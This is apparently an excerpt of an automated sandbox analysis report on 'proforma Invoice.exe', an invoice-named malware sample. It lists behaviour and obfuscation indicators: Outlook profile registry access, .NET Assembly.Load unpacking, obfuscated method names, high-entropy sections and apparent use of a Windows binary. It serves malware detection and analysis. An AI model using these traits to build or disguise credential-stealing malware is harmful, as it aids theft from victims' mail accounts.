                Source: C:\Users\user\Desktop\proforma Invoice.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: proforma Invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: proforma Invoice.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: EhStorAuthn.pdbGCTL source: proforma Invoice.exe, 00000003.00000002.2475617708.0000000000CD7000.00000004.00000020.00020000.00000000.sdmp, kYuxUXtJmKaZ.exe, 00000005.00000002.4498094986.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: kYuxUXtJmKaZ.exe, 00000005.00000000.2387057880.000000000052E000.00000002.00000001.01000000.0000000C.sdmp, kYuxUXtJmKaZ.exe, 00000008.00000002.4497067951.000000000052E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: proforma Invoice.exe, 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000003.2475630207.00000000043E8000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000003.2477867470.000000000459E000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: proforma Invoice.exe, proforma Invoice.exe, 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, EhStorAuthn.exe, 00000006.00000003.2475630207.00000000043E8000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000003.2477867470.000000000459E000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: EhStorAuthn.pdb source: proforma Invoice.exe, 00000003.00000002.2475617708.0000000000CD7000.00000004.00000020.00020000.00000000.sdmp, kYuxUXtJmKaZ.exe, 00000005.00000002.4498094986.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, pAdSVAtSJwrJrQ6sVq.cs.Net Code: X6XnvWyia0 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.proforma Invoice.exe.5820000.4.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.proforma Invoice.exe.3f18e88.3.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, pAdSVAtSJwrJrQ6sVq.cs.Net Code: X6XnvWyia0 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.proforma Invoice.exe.3ef8e68.2.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, pAdSVAtSJwrJrQ6sVq.cs.Net Code: X6XnvWyia0 System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 0_2_0147EFB0 push eax; iretd 0_2_0147EFB1
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_00425043 push edi; retf 3_2_0042504E
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_004190E7 push 0000006Ch; retf 3_2_00419103
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0041E968 pushad ; retf 3_2_0041E969
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0042DA53 push ds; retf 3_2_0042DA6A
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_00401A51 push ss; retf 3_2_00401A52
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_00412259 push edi; retf 3_2_0041226F
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_00412263 push edi; retf 3_2_0041226F
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_00401AE1 push ss; retf 3_2_00401AE2
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_004122A7 push edi; retf 3_2_0041226F
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_00403365 push 00000058h; retf 3_2_0040336E
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_00418447 push edi; retf 3_2_00418451
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_00414405 push edi; retf 3_2_00414406
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0041EC2B push ebp; ret 3_2_0041ECA1
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0040AC2B push esp; retf 3_2_0040AC3A
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_00413573 push eax; retf 3_2_00413534
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0041ED12 push ebp; ret 3_2_0041ECA1
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_00405532 push ecx; iretd 3_2_00405535
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_004035F0 push eax; ret 3_2_004035F2
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0040D617 push FFFFFFBEh; retf 3_2_0040D61D
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0041A6E9 push esp; retf 3_2_0041A6EA
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_00404FE9 push ebx; iretd 3_2_00404FEA
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011609AD push ecx; mov dword ptr [esp], ecx3_2_011609B6
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047809AD push ecx; mov dword ptr [esp], ecx6_2_047809B6
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_006F5026 push 0936996Ch; ret 6_2_006F502D
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_006F70F6 push esp; retf 6_2_006F70F7
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_006F212A push esp; retf 6_2_006F215F
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_006FB375 pushad ; retf 6_2_006FB376
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0070A460 push ds; retf 6_2_0070A477
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_006E7638 push esp; retf 6_2_006E7647
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_006FB638 push ebp; ret 6_2_006FB6AE
                Source: proforma Invoice.exeStatic PE information: section name: .text entropy: 7.599057364537114
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, Bc9QqtBcicE3mK58b5.csHigh entropy of concatenated method names: 'dgrhUmW9Rl', 'GVqhgBwWa9', 'vfUJ0w3mcs', 'efIJ1ZyBM2', 'tfuhLVntmn', 'xaahRKAA05', 'HSjhWKmycQ', 'RHAhPblwDp', 'XX8hbw4fjw', 'guMhwTtFD7'
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, frFY13PLkX031EGJme.csHigh entropy of concatenated method names: 'v1ws4H6vaK', 'AtisRcDnCM', 'RDVsPVP679', 'HwpsbgrKEs', 'Yv8sxG9eCF', 'lkgskuNwQD', 'vb0sVZ9FWn', 'MPWsyHKewg', 'PtWsiVWSxm', 'jp8sIMM5W2'
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, F2t22S111mq0uoySXMa.csHigh entropy of concatenated method names: 'ToString', 'CebSfacjpc', 'frPSnsGrZw', 'XN9SmTfwao', 'iC6SO3eMJt', 'tJqSYVRqHQ', 'Ig0S5F3tLF', 'B1KSuEOhD2', 'vB99wVmXNA20AQPrPPK', 'I6umh4mwxFJuXfTURps'
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, X9Gv0v10rUEeBLbGg0w.csHigh entropy of concatenated method names: 'M2nA2CtJHc', 'KGUAe1ksOj', 'Fc8AvPvaOl', 'GR6ANbZ8y3', 'o7uAXOjr36', 'hA8Ao9hUIG', 'MXNA7brCEM', 'nH5AEcBc98', 'rO9AcZ7G5a', 'PsiAQ7H1qv'
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, YnT3KHH1Ulg2JOvnXy.csHigh entropy of concatenated method names: 'fPCvLe1TC', 'loMNtaO7q', 'zJAoNLvBO', 'lMQ7RxI3o', 'I5McsoXPU', 'F6HQPbmxD', 'euOirR6kiiofS4fKbY', 'Ld9DXl0EKpDHDxXj9v', 'Jc9JGqnVf', 'hFLS2xpcN'
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, obrtlCgHPqSP8U6l80.csHigh entropy of concatenated method names: 'WJvA1Pbf2h', 'givAfxb1AP', 'hpKAnhchTB', 'VlWAOLqcYd', 'UD3AYcOEKK', 'gKrAuGHZQH', 'nfeATjn2Nj', 'HiMJGdjZVr', 'baLJUIj7D4', 'iUOJjsvRWQ'
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, AChAMEYPRVVmhmPPUU.csHigh entropy of concatenated method names: 'Dispose', 'HEs1jUfu3P', 'sOtHxZvjnE', 'OY6NNqU03k', 'YAh1gU4p9s', 'kIW1z2S6MC', 'ProcessDialogKey', 'yDsH0sknQ3', 'pZRH1qGkiy', 'fwkHHsbrtl'
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, EvHFJOxTuj5RZcIHU1.csHigh entropy of concatenated method names: 'j1uTdJEebR82cSQI7Gy', 'D9Xr51EKvAVlMjM6D3U', 'L4jTJeF8Yt', 'sN6TAAUPq0', 'sSFTSKqWrR', 'cOkL4PENeWg6wWSiuOw', 'FDPCffELy9EqiiYOUHR'
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, CemaC0EQg1IJaEF3y9.csHigh entropy of concatenated method names: 'lKhYPbUDVG', 'KvcYbEe08O', 'PMZYwgK4Ej', 'J1kY6IE4WZ', 'u8XYMHDQA9', 'FJ0YBeomAY', 'cA2YG0C6VG', 'e2TYU6k2EX', 'RVYYjQuh0N', 'LhAYghoAR1'
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, DXfa1W5uIxWbCxb1Ub.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wVmHjLg3Ge', 'NsKHgpBUyb', 'XbCHzRQR9I', 'WMQf0j6lt1', 'N60f1xjqqv', 'fl0fHVudN3', 'Tj6ffdbnI5', 'jgDRaiPb44A6HiBxvox'
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, MSNvtln2HvvOpQ5QOi.csHigh entropy of concatenated method names: 'X2o1aemaC0', 'Fg11tIJaEF', 'GDF130n04Q', 'kW61dA0QB4', 'zeU1sHvKbX', 'yqf1FbI8jC', 'coXJ8RkSM8WjwEEvwU', 'iyboGoYWLN3PhnWFjO', 'NN211qTedb', 'eHY1fl8u8O'
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, D54PXOI7OUHMYsywfu.csHigh entropy of concatenated method names: 'AEiaOTsy3W', 'DeDa5B67wX', 'jMuaThsZ2q', 'khlTgcUiM0', 'j6cTzJpgPs', 'juda03nLmP', 'pnIa1KV1F8', 't3oaHnMaWs', 'qdxafqsMXq', 'GydanUkkqA'
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, hNFWw9wKiPcdCKODJU.csHigh entropy of concatenated method names: 'ToString', 'y1qFLyt8fm', 'gZCFxBDVVH', 'KACFkcLuq0', 'YyWFVo96Z9', 'TBXFy3UVG0', 'Ai2FiGsatn', 'TBWFIn4hoJ', 'oAuFqmo0Xi', 'PUEFldQxjP'
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, GbX2qfKbI8jCbFncd2.csHigh entropy of concatenated method names: 'KsKTmBg75E', 'pEXTYQPhyB', 'u7RTuQG88E', 'nOqTad15HY', 'fueTtTRf1V', 'XD5uMio0iu', 'NhTuBOCuTa', 'wtLuG0UEnx', 'mPKuUFWbSo', 'zZLujMKrOC'
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, aQB4p3Qnt1hobNeUHv.csHigh entropy of concatenated method names: 'yc0uXS5Uk4', 'VOvu7XA5le', 'hZM5kyUPVi', 'Wnp5VM7nj9', 'uFO5yaS5ac', 'ihQ5i1y83B', 'c025IbARaU', 'Qmt5q18G9w', 'E7y5lOcxOG', 'MV8543pOy6'
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, rhU4p9UstIW2S6MCeD.csHigh entropy of concatenated method names: 'XEaJOA7Gi2', 'uWFJYg4aoo', 'fQhJ5BtL1R', 'lS9Juhf0AJ', 'NtNJTpyXoN', 'E95JaRjEcs', 'Ut3JtaBEPq', 'JNvJZadw8i', 'VOeJ3Ih9gg', 'UmLJd9VPmu'
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, PfYJUvlpfloB23qrsM.csHigh entropy of concatenated method names: 'Q3ba2tyelp', 'FxeaeLBBB5', 'pxcavH3vir', 'RMuaNj0HjX', 'GHraXvUp9E', 'I83aouRgZa', 'PD9a7hDhly', 'IHtaE96JC4', 'mowacToMHK', 'CtHaQfymyJ'
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, osknQ3jFZRqGkiyOwk.csHigh entropy of concatenated method names: 'UnMJKDRlGZ', 'GddJxjJ3jI', 'VukJkEXC4e', 'htnJVFg1Vd', 'AQDJPCEtsr', 'nBFJy6n7DF', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, FTROZxcDF0n04QtW6A.csHigh entropy of concatenated method names: 'rNm5N4Psil', 'Vra5oSE5AL', 'BmC5ETyTwi', 'WnB5cpSsxZ', 'RXA5sKE9F9', 'EUo5FCkVUQ', 'l6A5hvrlqe', 'AOf5J4Ne7p', 'W0t5AFHhbZ', 'cSJ5SyIK0g'
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, JpGDeOW2872AOverOI.csHigh entropy of concatenated method names: 'XUPrEAqL41', 'xIbrcTXm6c', 'ls1rKb7YY3', 'Xp9rxDatds', 'fvxrVYB1OO', 'ThwryFrNSt', 'zARrIB0K0B', 'uxarqyWVFQ', 'E83r4mkJqH', 'nOErLPcNIl'
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, pAdSVAtSJwrJrQ6sVq.csHigh entropy of concatenated method names: 'QBZfmKGQ5Y', 'CSqfOXTxCS', 'p7ufYscNUr', 'cbVf5DHmb9', 'OnsfuxXx8T', 'CwPfT8aKR8', 'toefaJV9id', 'FEQftBxuHo', 'oiUfZ47mHU', 'qndf3EGydp'
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, dr4Rsf6rNqdXKT47XL.csHigh entropy of concatenated method names: 'QCEh3KOU6l', 'WaChdC211N', 'ToString', 'Y0whOk55Jr', 'lPihYncVNX', 'pM7h5m0F5w', 'mAJhullDxK', 'kq4hTZFnR7', 'JPAhaknbN2', 'NfxhtkBsLS'
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, UFBfuA1fBvY5mTK4NnR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PCkSP9unBa', 'h9gSbBDTiB', 'lAuSwQOkm8', 'uc8S6y3IGc', 'gBFSMAcE60', 'sTWSBfY9bW', 'ME1SGeFmyO'
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, Bc9QqtBcicE3mK58b5.csHigh entropy of concatenated method names: 'dgrhUmW9Rl', 'GVqhgBwWa9', 'vfUJ0w3mcs', 'efIJ1ZyBM2', 'tfuhLVntmn', 'xaahRKAA05', 'HSjhWKmycQ', 'RHAhPblwDp', 'XX8hbw4fjw', 'guMhwTtFD7'
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, frFY13PLkX031EGJme.csHigh entropy of concatenated method names: 'v1ws4H6vaK', 'AtisRcDnCM', 'RDVsPVP679', 'HwpsbgrKEs', 'Yv8sxG9eCF', 'lkgskuNwQD', 'vb0sVZ9FWn', 'MPWsyHKewg', 'PtWsiVWSxm', 'jp8sIMM5W2'
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, F2t22S111mq0uoySXMa.csHigh entropy of concatenated method names: 'ToString', 'CebSfacjpc', 'frPSnsGrZw', 'XN9SmTfwao', 'iC6SO3eMJt', 'tJqSYVRqHQ', 'Ig0S5F3tLF', 'B1KSuEOhD2', 'vB99wVmXNA20AQPrPPK', 'I6umh4mwxFJuXfTURps'
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, X9Gv0v10rUEeBLbGg0w.csHigh entropy of concatenated method names: 'M2nA2CtJHc', 'KGUAe1ksOj', 'Fc8AvPvaOl', 'GR6ANbZ8y3', 'o7uAXOjr36', 'hA8Ao9hUIG', 'MXNA7brCEM', 'nH5AEcBc98', 'rO9AcZ7G5a', 'PsiAQ7H1qv'
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, YnT3KHH1Ulg2JOvnXy.csHigh entropy of concatenated method names: 'fPCvLe1TC', 'loMNtaO7q', 'zJAoNLvBO', 'lMQ7RxI3o', 'I5McsoXPU', 'F6HQPbmxD', 'euOirR6kiiofS4fKbY', 'Ld9DXl0EKpDHDxXj9v', 'Jc9JGqnVf', 'hFLS2xpcN'
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, obrtlCgHPqSP8U6l80.csHigh entropy of concatenated method names: 'WJvA1Pbf2h', 'givAfxb1AP', 'hpKAnhchTB', 'VlWAOLqcYd', 'UD3AYcOEKK', 'gKrAuGHZQH', 'nfeATjn2Nj', 'HiMJGdjZVr', 'baLJUIj7D4', 'iUOJjsvRWQ'
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, AChAMEYPRVVmhmPPUU.csHigh entropy of concatenated method names: 'Dispose', 'HEs1jUfu3P', 'sOtHxZvjnE', 'OY6NNqU03k', 'YAh1gU4p9s', 'kIW1z2S6MC', 'ProcessDialogKey', 'yDsH0sknQ3', 'pZRH1qGkiy', 'fwkHHsbrtl'
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, EvHFJOxTuj5RZcIHU1.csHigh entropy of concatenated method names: 'j1uTdJEebR82cSQI7Gy', 'D9Xr51EKvAVlMjM6D3U', 'L4jTJeF8Yt', 'sN6TAAUPq0', 'sSFTSKqWrR', 'cOkL4PENeWg6wWSiuOw', 'FDPCffELy9EqiiYOUHR'
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, CemaC0EQg1IJaEF3y9.csHigh entropy of concatenated method names: 'lKhYPbUDVG', 'KvcYbEe08O', 'PMZYwgK4Ej', 'J1kY6IE4WZ', 'u8XYMHDQA9', 'FJ0YBeomAY', 'cA2YG0C6VG', 'e2TYU6k2EX', 'RVYYjQuh0N', 'LhAYghoAR1'
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, DXfa1W5uIxWbCxb1Ub.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wVmHjLg3Ge', 'NsKHgpBUyb', 'XbCHzRQR9I', 'WMQf0j6lt1', 'N60f1xjqqv', 'fl0fHVudN3', 'Tj6ffdbnI5', 'jgDRaiPb44A6HiBxvox'
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, MSNvtln2HvvOpQ5QOi.csHigh entropy of concatenated method names: 'X2o1aemaC0', 'Fg11tIJaEF', 'GDF130n04Q', 'kW61dA0QB4', 'zeU1sHvKbX', 'yqf1FbI8jC', 'coXJ8RkSM8WjwEEvwU', 'iyboGoYWLN3PhnWFjO', 'NN211qTedb', 'eHY1fl8u8O'
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, D54PXOI7OUHMYsywfu.csHigh entropy of concatenated method names: 'AEiaOTsy3W', 'DeDa5B67wX', 'jMuaThsZ2q', 'khlTgcUiM0', 'j6cTzJpgPs', 'juda03nLmP', 'pnIa1KV1F8', 't3oaHnMaWs', 'qdxafqsMXq', 'GydanUkkqA'
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, hNFWw9wKiPcdCKODJU.csHigh entropy of concatenated method names: 'ToString', 'y1qFLyt8fm', 'gZCFxBDVVH', 'KACFkcLuq0', 'YyWFVo96Z9', 'TBXFy3UVG0', 'Ai2FiGsatn', 'TBWFIn4hoJ', 'oAuFqmo0Xi', 'PUEFldQxjP'
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, GbX2qfKbI8jCbFncd2.csHigh entropy of concatenated method names: 'KsKTmBg75E', 'pEXTYQPhyB', 'u7RTuQG88E', 'nOqTad15HY', 'fueTtTRf1V', 'XD5uMio0iu', 'NhTuBOCuTa', 'wtLuG0UEnx', 'mPKuUFWbSo', 'zZLujMKrOC'
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, aQB4p3Qnt1hobNeUHv.csHigh entropy of concatenated method names: 'yc0uXS5Uk4', 'VOvu7XA5le', 'hZM5kyUPVi', 'Wnp5VM7nj9', 'uFO5yaS5ac', 'ihQ5i1y83B', 'c025IbARaU', 'Qmt5q18G9w', 'E7y5lOcxOG', 'MV8543pOy6'
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, rhU4p9UstIW2S6MCeD.csHigh entropy of concatenated method names: 'XEaJOA7Gi2', 'uWFJYg4aoo', 'fQhJ5BtL1R', 'lS9Juhf0AJ', 'NtNJTpyXoN', 'E95JaRjEcs', 'Ut3JtaBEPq', 'JNvJZadw8i', 'VOeJ3Ih9gg', 'UmLJd9VPmu'
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, PfYJUvlpfloB23qrsM.csHigh entropy of concatenated method names: 'Q3ba2tyelp', 'FxeaeLBBB5', 'pxcavH3vir', 'RMuaNj0HjX', 'GHraXvUp9E', 'I83aouRgZa', 'PD9a7hDhly', 'IHtaE96JC4', 'mowacToMHK', 'CtHaQfymyJ'
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, osknQ3jFZRqGkiyOwk.csHigh entropy of concatenated method names: 'UnMJKDRlGZ', 'GddJxjJ3jI', 'VukJkEXC4e', 'htnJVFg1Vd', 'AQDJPCEtsr', 'nBFJy6n7DF', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, FTROZxcDF0n04QtW6A.csHigh entropy of concatenated method names: 'rNm5N4Psil', 'Vra5oSE5AL', 'BmC5ETyTwi', 'WnB5cpSsxZ', 'RXA5sKE9F9', 'EUo5FCkVUQ', 'l6A5hvrlqe', 'AOf5J4Ne7p', 'W0t5AFHhbZ', 'cSJ5SyIK0g'
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, JpGDeOW2872AOverOI.csHigh entropy of concatenated method names: 'XUPrEAqL41', 'xIbrcTXm6c', 'ls1rKb7YY3', 'Xp9rxDatds', 'fvxrVYB1OO', 'ThwryFrNSt', 'zARrIB0K0B', 'uxarqyWVFQ', 'E83r4mkJqH', 'nOErLPcNIl'
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, pAdSVAtSJwrJrQ6sVq.csHigh entropy of concatenated method names: 'QBZfmKGQ5Y', 'CSqfOXTxCS', 'p7ufYscNUr', 'cbVf5DHmb9', 'OnsfuxXx8T', 'CwPfT8aKR8', 'toefaJV9id', 'FEQftBxuHo', 'oiUfZ47mHU', 'qndf3EGydp'
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, dr4Rsf6rNqdXKT47XL.csHigh entropy of concatenated method names: 'QCEh3KOU6l', 'WaChdC211N', 'ToString', 'Y0whOk55Jr', 'lPihYncVNX', 'pM7h5m0F5w', 'mAJhullDxK', 'kq4hTZFnR7', 'JPAhaknbN2', 'NfxhtkBsLS'
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, UFBfuA1fBvY5mTK4NnR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PCkSP9unBa', 'h9gSbBDTiB', 'lAuSwQOkm8', 'uc8S6y3IGc', 'gBFSMAcE60', 'sTWSBfY9bW', 'ME1SGeFmyO'
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, Bc9QqtBcicE3mK58b5.csHigh entropy of concatenated method names: 'dgrhUmW9Rl', 'GVqhgBwWa9', 'vfUJ0w3mcs', 'efIJ1ZyBM2', 'tfuhLVntmn', 'xaahRKAA05', 'HSjhWKmycQ', 'RHAhPblwDp', 'XX8hbw4fjw', 'guMhwTtFD7'
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, frFY13PLkX031EGJme.csHigh entropy of concatenated method names: 'v1ws4H6vaK', 'AtisRcDnCM', 'RDVsPVP679', 'HwpsbgrKEs', 'Yv8sxG9eCF', 'lkgskuNwQD', 'vb0sVZ9FWn', 'MPWsyHKewg', 'PtWsiVWSxm', 'jp8sIMM5W2'
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, F2t22S111mq0uoySXMa.csHigh entropy of concatenated method names: 'ToString', 'CebSfacjpc', 'frPSnsGrZw', 'XN9SmTfwao', 'iC6SO3eMJt', 'tJqSYVRqHQ', 'Ig0S5F3tLF', 'B1KSuEOhD2', 'vB99wVmXNA20AQPrPPK', 'I6umh4mwxFJuXfTURps'
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, X9Gv0v10rUEeBLbGg0w.csHigh entropy of concatenated method names: 'M2nA2CtJHc', 'KGUAe1ksOj', 'Fc8AvPvaOl', 'GR6ANbZ8y3', 'o7uAXOjr36', 'hA8Ao9hUIG', 'MXNA7brCEM', 'nH5AEcBc98', 'rO9AcZ7G5a', 'PsiAQ7H1qv'
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, YnT3KHH1Ulg2JOvnXy.csHigh entropy of concatenated method names: 'fPCvLe1TC', 'loMNtaO7q', 'zJAoNLvBO', 'lMQ7RxI3o', 'I5McsoXPU', 'F6HQPbmxD', 'euOirR6kiiofS4fKbY', 'Ld9DXl0EKpDHDxXj9v', 'Jc9JGqnVf', 'hFLS2xpcN'
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, obrtlCgHPqSP8U6l80.csHigh entropy of concatenated method names: 'WJvA1Pbf2h', 'givAfxb1AP', 'hpKAnhchTB', 'VlWAOLqcYd', 'UD3AYcOEKK', 'gKrAuGHZQH', 'nfeATjn2Nj', 'HiMJGdjZVr', 'baLJUIj7D4', 'iUOJjsvRWQ'
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, AChAMEYPRVVmhmPPUU.csHigh entropy of concatenated method names: 'Dispose', 'HEs1jUfu3P', 'sOtHxZvjnE', 'OY6NNqU03k', 'YAh1gU4p9s', 'kIW1z2S6MC', 'ProcessDialogKey', 'yDsH0sknQ3', 'pZRH1qGkiy', 'fwkHHsbrtl'
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, EvHFJOxTuj5RZcIHU1.csHigh entropy of concatenated method names: 'j1uTdJEebR82cSQI7Gy', 'D9Xr51EKvAVlMjM6D3U', 'L4jTJeF8Yt', 'sN6TAAUPq0', 'sSFTSKqWrR', 'cOkL4PENeWg6wWSiuOw', 'FDPCffELy9EqiiYOUHR'
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, CemaC0EQg1IJaEF3y9.csHigh entropy of concatenated method names: 'lKhYPbUDVG', 'KvcYbEe08O', 'PMZYwgK4Ej', 'J1kY6IE4WZ', 'u8XYMHDQA9', 'FJ0YBeomAY', 'cA2YG0C6VG', 'e2TYU6k2EX', 'RVYYjQuh0N', 'LhAYghoAR1'
